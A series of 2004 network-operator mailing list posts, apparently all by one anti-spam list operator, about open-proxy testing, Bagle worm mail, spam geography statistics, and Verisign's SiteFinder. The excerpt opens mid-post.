filtered out our DNS traffic, it only affected his network... But imagine if he had launched an attack against my DNS servers in response? Yeah, thats a great idea. Of course, now that the AHBL does its own proxy testing, we get all sorts of fun reports from end users about our 'attacks' against their machines. Latest one demanded I tell her why we had scanned her, but wouldn't tell me her IP address or when the scan happened exactly, claiming that I had done the scan, so I should know what IP she is. Too bad I test over 100,000 IP addresses daily for open proxies Lets not even get into the legal consequences for a tool like this, especially if it backfires and launches an attack against the NIPC, for example. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: dealing with w32/bagle
Quoting Dan Hollis [EMAIL PROTECTED]: I am curious how network operators are dealing with the latest w32/bagle variants which seem particularly evil. Also, does anyone have tools for regexp and purging these mails from unix mailbox (not maildir) mailspool files? Eg purging these mails after the fact if they were delivered to user's mailboxes before your virus scanner got a database update. I am also interested in what network/mail folks are doing about this situation. Blocking all zip files at the mail level is next to impossible (since of course when we started blocking executable files, we told people to zip up executables) and since business can't be taken care of without someone requiring zip files to pass. I will be the first to admit that using mail as a file transfer protocol isn't the way to go, but getting people to realize that (and forcing them to change) is next to impossible. Brian
Re: The Geography of Spam
On Tuesday, March 02, 2004 11:11 AM [EST], [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Thought folks might find this blurb from Sophos on the geography of Spam interesting. 30% of Spam, they report, comes from hijacked PC's. Matches pretty close to what we see across our network - i.e. all sorts of stuff from swbell.net o U.S. Routes More Spam than World Combined, Study Shows Paris -- Intentionally or not, the U.S. routes more spam e-mail traffic than the rest of the world combined, according to a new study by anti-virus firm Sophos. The study concludes that most of the unsolicited junk e-mails originate in Russia and then passes through hacked computers in the U.S. More than 30% of the world's spam is sent from these compromised computers, underlining the need for a coordinated approach to spam and viruses, said Charles Cousins, Sophos' Asia managing director . The U.S. accounts for a whopping 56% of the global spam pie, followed by Canada with 6.8%. Europe did not fair very well in the report either, with the Netherlands (5th), Germany (7th), France (8th), the U.K. (9th) and Spain (12th) all making the list. http://www.sophos.com/spaminfo/articles/dirtydozen.html I guess I can say, that I can somewhat agree with what they are saying, but the percentage seems to be a bit lower then what I would have said. With the recent round of viruses that seem to be designed to help spammers hijack end user machines, I'd say the percentage is more towards 45-50%. Sometimes its very hard to tell the difference between an open proxy, and a drone running an open proxy (take the AHBL's proxy list, which is over 410,000 proxies listed, and our infected/hijacked machine count comes nowhere near that). Part of the reason why alot of the spam comes from outside of the US is because US spammers need to hide their actual locations in order to avoid getting snared by CAN-SPAM and similar. This is why Ralsky bases his spamming campaigns out of China, where the laws are more relaxed in terms of this stuff, and is less likely to get yanked off of his net connection. This is also why spammers have 'fronts'. :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Need Comcast contact
Anyone happen to know of a contact for Comcast's mail server administrators? I need to discuss an issue with them about their mail servers mailbombing my systems from a joe job. Thanks. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Microsoft on security holes
I just saw this on slashdot, so for those of you who don't read slashdot, enjoy. http://news.bbc.co.uk/1/hi/technology/3485972.stm Yeah, its a little bit off topic, but with the recent amount of viruses, worms, trojans, etc going around the Internet that are causing havoc with general day to day operations of ISPs, this is quite an interesting read. Basically, Microsoft is claiming that security exploits only come out after patches. Uh huh, yeah right. (waiting for his list AUP violation notice, again) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: ICANN/Registry Agreement:
On Thursday, February 26, 2004 8:21 PM [EST], Deepak Jain [EMAIL PROTECTED] wrote: Doesn't sitefinder give one registry superior access to the registry's resources than the others, etc, etc? Rather then clutter up NANOG with this stuff, since its apparent that we will be having more issues about SiteFinder, I've gone ahead and setup a discussion list on my server for general talk about SiteFinder. Its unmoderated, everyone is welcome to signup and post your views. http://wwwapps.2mbit.com/mailman/listinfo/sitefinder-discuss -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: ICANN/Registry Agreement:
On Thursday, February 26, 2004 8:21 PM [EST], Deepak Jain [EMAIL PROTECTED] wrote: Doesn't sitefinder give one registry superior access to the registry's resources than the others, etc, etc? It gives Verisign/NetSol the ability to generate exclusive profit from the hijacking of every non-existant domain name in existance. No other registar could do something like this without paying for every last domain they take, or could they ever do anything like this due to the fact that Verisign/NetSol controls ALL of the TLD servers for .com and .net. -- Brian Brunsk The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
